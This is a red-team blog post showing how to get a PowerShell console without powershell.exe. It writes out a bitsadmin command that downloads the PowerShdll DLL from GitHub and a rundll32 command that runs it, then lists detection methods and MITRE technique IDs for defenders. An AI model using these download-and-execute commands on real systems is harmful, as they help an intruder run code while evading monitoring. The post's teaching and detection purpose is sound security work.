Hiding In Plain Sight
Posted on 2020-02-24 by Samuel Kimmons
During a recent test, one of the goals was to utilize PowerShell without executing the powershell.exe binary. So, naturally, I dove into researching PowerShell without PowerShell. After doing quite a bit of research, I decided to go with PowerShdll.
This DLL was created by p3nt4 and allows you to execute PowerShell Scripts, commands, encoded commands, and even an interactive shell. Ok, so I could download this on a box and execute it, and boom, now I have PowerShell without PowerShell. I began to think, why not take it a step further. If you’re thinking about it from an adversary’s perspective, and for this particular scenario, we want to execute some PowerShell scripts or commands without triggering any detections.
By taking it a step further, I wanted to start with the classic command prompt. Now I could have immediately gone with another toolset, but I’m a big fan of Living Off the Land Techniques. With access to the command prompt, I need to figure out a way to get the PowerShdll onto the system. Fortunately, Microsoft Windows includes plenty of binaries that incorporate some form of download functionality.
These built-in binaries are commonly referred to as LoLBins or Living Off the Land Binaries. For the download functionality, I chose the BITSADMIN LoLBin. According to Microsoft, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.” The “download or upload jobs” is exactly what we’re looking for. Now that we have our shell (CMD prompt) and our LoLBin (BITSADMIN), it’s time to download the DLL needed for this test.
bitsadmin /transfer test /priority high https://github.com/p3nt4/PowerShdll/blob/master/dll/bin/x64/Release/PowerShdll.dll?raw=true C:\Users\User\Downloads\test.dll
The command above specifies that we want to use bitsadmin, with a job title of “test” to download the PowerShdll.dll from the Github repository and create a file called test.dll on the local system.
The bitsadmin LoLBin is even nice enough to show the progress of the download.
Now that we have the target dll downloaded, we need a way to invoke it.
Rundll32 has the ability to load and run 32-bit DLLs. Based on the available options for PowerShdll, we want to start an interactive console. According to the options listed on the PowerShdll repo, we can utilize -w (interactive console in new window) or -i (interactive console within the current console).
Here is the command that we’re going to use:
Rundll32 test.dll,main -w
The “main” portion of the command specifies the entry point that we’ll be using within the DLL.
After the command executes successfully, a new window opens up with an interactive PowerShell console...without invoking the actual PowerShell.exe binary.
When viewing the process tree in Process Hacker, this is what you'll see:
We’ve achieved our objectives of using a LoLBin for download capability and another for executing PowerShell without the PowerShell binary.
Now to turn the table around and look at it from a defensive perspective.
The first question: “How can we detect this?”
1. In order to detect this at the earliest part of the execution chain, we should start with the BITSAdmin process.
- Your Endpoint protection triggers on the BITSAdmin LoLBin.
- Event ID 4688 (A New Process Has Been Created)...this assumes that your host logs are being forwarded to some sort of security monitoring system.
- If you employ a network monitoring capability, you should notice a BITS user agent string.
2. If you're attempting to detect the use of PowerShell without the PowerShell binary:
- One method would be to look for the invocation of the System.Management.Automation.dll.
---- Most EDR solutions should be able to provide a detection capability for this.
- If you're looking at the host locally, you can view the threads and dlls invoked by rundll32, or any other process.
In this example, I've searched for the System.Management.Automation.dll
For comparison, here's what it will look like once the process has exited:
What categories on the Mitre Table should we be concerned with?
- There are several, but to keep it simple, we should focus on the two listed below.
|T1105||Remote File Copy||BITSAdmin can be used to create BITS Jobs to upload and/or download files|
|T1085||Rundll32||Can be called to execute an arbitrary binary|
So, after experimenting with PowerShell without PowerShell, we can see that it's pretty effective. Another thing to note is that if you're not properly monitoring LoLBins for malicious activity, you could be missing quite a bit. While these types of techniques are widely used, there are ways to detect and possibly restrict the use of LoLBins.
Samuel Kimmons is a Lead Cyber Threat Emulator/Red Teamer and Penetration Tester at the United States-Air Force Computer Emergency Response Team (US-AFCERT). He has several years of experience which include: red teaming, endpoint security, vulnerability management, penetration testing, and system administration. Samuel is responsible for conducting red team engagements, full scope penetration tests, researching and utilizing adversary Tactics, Techniques, and Procedures. In addition to his work experience and training, Samuel holds GCIH, GWAPT, GPEN, GXPN, GCFA, and is currently pursuing: OSCP. He also enjoys giving back to the security community by creating Cyber Security and Hacking blogs and videos.